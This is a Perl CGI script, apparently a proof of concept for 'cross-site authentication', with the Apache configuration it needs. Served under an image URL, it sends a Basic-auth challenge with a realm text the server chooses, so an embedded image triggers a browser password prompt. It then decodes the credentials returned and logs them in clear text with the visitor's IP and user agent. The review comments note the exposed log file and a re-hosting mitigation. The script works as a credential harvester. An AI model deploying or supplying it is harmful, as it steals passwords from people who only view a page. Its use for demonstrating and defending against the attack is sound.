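#!/usr/bin/perl
# XSA (cross-site authentication) demonstration endpoint.
#
# The script is served under an image URL. A request without an Authorization
# header is answered with a 401 challenge for HTTP Basic authentication. A
# request that carries one is answered with hacked.png, and if the header uses
# the Basic scheme the decoded credentials are appended to auth.log.
#
# To give the script access to the authentication data, I use the following
# snippet in the apache configuration:
#
#   RewriteEngine on
#   RewriteCond %{HTTP:Authorization} ^(.*)
#   RewriteRule /xsa-test/example.png - [e=HTTP_AUTHORIZATION:%1]
#   ScriptAlias /xsa-test/example.png /var/www/nomeata.de/xsa-test/nph-example.pl
#
# NOTE(review): auth.log is opened by relative path, so it is created in the
# CGI working directory -- presumably the script directory under /var/www.
# Confirm that this file cannot be fetched over HTTP; it holds "user:password"
# pairs in clear text.
# NOTE(review): the realm text in the 401 challenge is chosen by this server
# and is the only text the browser's password prompt shows, so the prompt says
# nothing reliable about who is asking. Sites that let users embed remote
# images can avoid the prompt by fetching and re-hosting the image themselves.

use strict;
use warnings;
use CGI qw/:cgi -nph/;
use MIME::Base64;

my $q = CGI->new();

if ($ENV{HTTP_AUTHORIZATION}) {
    if ($ENV{HTTP_AUTHORIZATION} =~ /^Basic (.*)$/) {
        my $base64 = $1;
        my $creds  = decode_base64($base64);
        my $agent  = defined $ENV{HTTP_USER_AGENT} ? $ENV{HTTP_USER_AGENT} : '';
        my $addr   = defined $ENV{REMOTE_ADDR}     ? $ENV{REMOTE_ADDR}     : '';

        # Both values come straight from the request. Replace anything outside
        # printable ASCII so that an embedded CR/LF cannot start a forged log
        # line. tr/// keeps the length unchanged, so the size cap below still
        # applies to the same entries as before.
        $creds =~ tr/\x20-\x7e/?/c;
        $agent =~ tr/\x20-\x7e/?/c;

        my $logstring = sprintf "%s %s running %s: %s\n",
            scalar(localtime), $addr, $agent, $creds;

        # Oversized entries are dropped rather than truncated.
        if (length($logstring) < 300) {
            # Logging is best effort: a failure is reported to the server's
            # error log and the response is still sent.
            if (open my $log, '>>', "auth.log") {
                print {$log} $logstring;
                close $log or warn "close auth.log: $!";
            }
            else {
                warn "open auth.log: $!";
            }
        }
    }

    # Any Authorization header, Basic or not, is answered with the image.
    print $q->header(-type=>'image/png');
    # List form: no shell is involved. exec only returns if it failed.
    exec('cat', 'hacked.png') or die "exec cat hacked.png: $!";
}
else {
    print $q->header(
        -type   => 'text/plain',
        -status => '401 Authentication required',
        "-WWW-Authenticate" => 'Basic realm="XSA example - this string is arbitrary"'
    );
    print "Please authenticate";
}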